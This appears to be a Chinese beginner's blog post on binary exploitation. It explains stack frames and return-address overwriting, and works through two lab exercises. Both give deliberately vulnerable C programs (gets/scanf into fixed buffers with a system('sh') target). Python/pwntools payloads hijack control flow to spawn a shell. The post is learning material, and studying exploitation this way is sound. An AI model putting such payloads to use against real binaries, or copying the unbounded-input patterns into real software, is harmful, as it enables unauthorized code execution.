<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="初学PWN…看他第一面我就知道自己和他没有太大的交集了…">
<meta property="og:type" content="article">
<meta property="og:title" content="“爬坑之路--BIN(四)--7">
<meta property="og:url" content="http://yoursite.com/2018/07/08/爬坑之路--BIN(四)--7/index.html">
<meta property="og:site_name" content="Archer">
<meta property="og:description" content="初学PWN…看他第一面我就知道自己和他没有太大的交集了…">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.imgur.com/mhIsQG3.jpg">
<meta property="og:image" content="https://i.imgur.com/AsxPm6n.png">
<meta property="og:image" content="https://i.imgur.com/halLx08.png">
<meta property="og:image" content="https://i.imgur.com/UxfFU4f.png">
<meta property="og:image" content="https://i.imgur.com/lPVOiai.png">
<meta property="og:image" content="https://i.imgur.com/ut8i9yD.png">
<meta property="og:updated_time" content="2018-07-09T13:21:40.157Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="“爬坑之路--BIN(四)--7">
<meta name="twitter:description" content="初学PWN…看他第一面我就知道自己和他没有太大的交集了…">
<meta name="twitter:image" content="https://i.imgur.com/mhIsQG3.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/07/08/爬坑之路--BIN(四)--7/"/>





  <title>“爬坑之路--BIN(四)--7 | Archer</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Archer</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/07/08/爬坑之路--BIN(四)--7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Fake Student">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Archer">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">“爬坑之路--BIN(四)--7</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-07-08T22:25:10+08:00">
                2018-07-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>初学PWN…<br>看他第一面我就知道自己和他没有太大的交集了…<br><a id="more"></a></p>
<h2 id="栈的结构"><a href="#栈的结构" class="headerlink" title="栈的结构"></a>栈的结构</h2><ul>
<li>栈顶地址<br><img src="https://i.imgur.com/mhIsQG3.jpg" alt=""></li>
<li>自身理解：首先入栈、出栈操作都是通过esp增加或者减少来改变的。便是假定ebp不动，入栈操作，esp减小，出栈操作，esp增加。当调用一个新的函数，首先将ebp函数入栈，然后ebp等于esp，便可以进行一段新的入栈操作。</li>
<li>栈的守护天使—GS，也叫Stack Canary或Cookie</li>
</ul>
<h2 id="汇编语言Call、Ret"><a href="#汇编语言Call、Ret" class="headerlink" title="汇编语言Call、Ret"></a>汇编语言Call、Ret</h2><ul>
<li>Call可看做 Push retaddr + Jump</li>
<li>Ret 可看做 Pop  retaddr + Jump</li>
</ul>
<h2 id="Linux-shell："><a href="#Linux-shell：" class="headerlink" title="Linux shell："></a>Linux shell：</h2><ul>
<li>cd       打开</li>
<li>ls       列出当前目录下所有文件</li>
<li>chmod    改变文件使用权限</li>
<li>pwd      显示当前坐在目录</li>
<li>objdump  查看目标文件或者可执行的目标文件的构成</li>
<li>gdb      使用gdb进行调试</li>
<li>checksec 检测二进制的保护机制是否开启</li>
<li>mkdir    创建文件夹</li>
</ul>
<h2 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h2><ul>
<li>因为如果要调用一个函数首先将ebp入栈保存，然后栈帧平衡，ebp=esp。从而开辟新的空间。假设被调用函数中有一个可以输入不限制长度的数组，又因为该数组的首地址比ebp入栈地址低，当输入一定长度时便可以覆盖后面需要retn的地址从而控制应该返回目标函数。<h3 id="例题一："><a href="#例题一：" class="headerlink" title="例题一："></a>例题一：</h3></li>
<li>环境：需要在unbuntu_Master 2 环境下运行<h4 id="源代码"><a href="#源代码" class="headerlink" title="源代码"></a>源代码</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">cmd</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	system(<span class="string">"sh"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">A</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> a[<span class="number">100</span>];</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">"%s"</span>,a);</span><br><span class="line">	<span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	A();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h4><p><img src="https://i.imgur.com/AsxPm6n.png" alt=""></p>
<ul>
<li>我们通过程序报错可知retn的地址就保存在ox41384141中，然后利用patto函数可以知道它是在第112个字节</li>
</ul>
<p><img src="https://i.imgur.com/halLx08.png" alt=""></p>
<ul>
<li><p>查看程序文件的构成并保存至dump目录</p>
</li>
<li><p>查看文件并找到函数<strong>cmd()</strong>的地址</p>
</li>
</ul>
<p><img src="https://i.imgur.com/UxfFU4f.png" alt=""></p>
<ul>
<li>利用python写payload=”a”112+p32(0x0804846b)</li>
</ul>
<p><img src="https://i.imgur.com/lPVOiai.png" alt=""></p>
<h4 id="利用Ret-slide"><a href="#利用Ret-slide" class="headerlink" title="利用Ret_slide"></a>利用Ret_slide</h4><p>(抄袭qff，有知道的大佬请详细告诉一下我)<br>在不知道返回地址偏移时，通过滑翔机（Ret_slide）设置payload减少尝试次数。即RET前的字符串利用其他RET地址来填充。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">from pwn <span class="keyword">import</span> *</span><br><span class="line">payload = <span class="string">"\x08\x04\x84\xa0"</span> * <span class="number">28</span> + <span class="string">"\x6b\x84\x04\x08"</span></span><br><span class="line">p = process(<span class="string">"./p1"</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h3 id="例题二"><a href="#例题二" class="headerlink" title="例题二"></a>例题二</h3><h4 id="源代码-1"><a href="#源代码-1" class="headerlink" title="源代码"></a>源代码</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">A</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"></span><br><span class="line">setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">	srand(time(<span class="number">0</span>) ^ getpid());</span><br><span class="line"></span><br><span class="line">	<span class="keyword">char</span> buf[<span class="number">100</span>];</span><br><span class="line"></span><br><span class="line">	<span class="keyword">int</span> magic = rand();</span><br><span class="line"></span><br><span class="line">	gets(buf);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (atoi(buf) == magic) &#123;</span><br><span class="line"></span><br><span class="line">		<span class="built_in">puts</span>(<span class="string">"Okay..."</span>);</span><br><span class="line"></span><br><span class="line">		system(<span class="string">"sh"</span>);</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line"></span><br><span class="line">	A();</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="解题步骤-1"><a href="#解题步骤-1" class="headerlink" title="解题步骤"></a>解题步骤</h4><ul>
<li>首先分析，如果当输入的字符串buf等于随机生成的magic那么便可以获得权限</li>
<li>下面来看我们是否可以用栈溢出的方法来尝试。</li>
<li>通过分析我们可知buf地址为[ebp-0x80],magic地址为[ebp-0x1c]。<br>因为buf的地址比magic地址低说明magic先入栈，然后buf入栈。而且他们两个之间相隔（0x80-0x1c)=100。又因为magic为指针型，所以占四个字节</li>
<li>下面可以构造payload，因为要buf转换成整型与magic相同，便可以两者都为0，payload=”/x00”*104</li>
</ul>
<p><img src="https://i.imgur.com/ut8i9yD.png" alt=""></p>
<ul>
<li>同时不知道，如果将buf的值和magic的值都设置为1自己实现不了，<br>payload=”\x00”*99+”\x01”+”\x01\x00\x00\x00”</li>
</ul>
<p>未完待续……</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/07/爬坑之路--WEB(四)--6/" rel="next" title="爬坑之路--WEB(四)--6">
                <i class="fa fa-chevron-left"></i> 爬坑之路--WEB(四)--6
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/07/09/爬坑之路--BIN(五)--9/" rel="prev" title="爬坑之路--BIN(五)--9">
                爬坑之路--BIN(五)--9 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Fake Student</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#栈的结构"><span class="nav-number">1.</span> <span class="nav-text">栈的结构</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#汇编语言Call、Ret"><span class="nav-number">2.</span> <span class="nav-text">汇编语言Call、Ret</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Linux-shell："><span class="nav-number">3.</span> <span class="nav-text">Linux shell：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#栈溢出"><span class="nav-number">4.</span> <span class="nav-text">栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#例题一："><span class="nav-number">4.1.</span> <span class="nav-text">例题一：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#源代码"><span class="nav-number">4.1.1.</span> <span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#解题步骤"><span class="nav-number">4.1.2.</span> <span class="nav-text">解题步骤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用Ret-slide"><span class="nav-number">4.1.3.</span> <span class="nav-text">利用Ret_slide</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#例题二"><span class="nav-number">4.2.</span> <span class="nav-text">例题二</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#源代码-1"><span class="nav-number">4.2.1.</span> <span class="nav-text">源代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#解题步骤-1"><span class="nav-number">4.2.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Fake Student</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
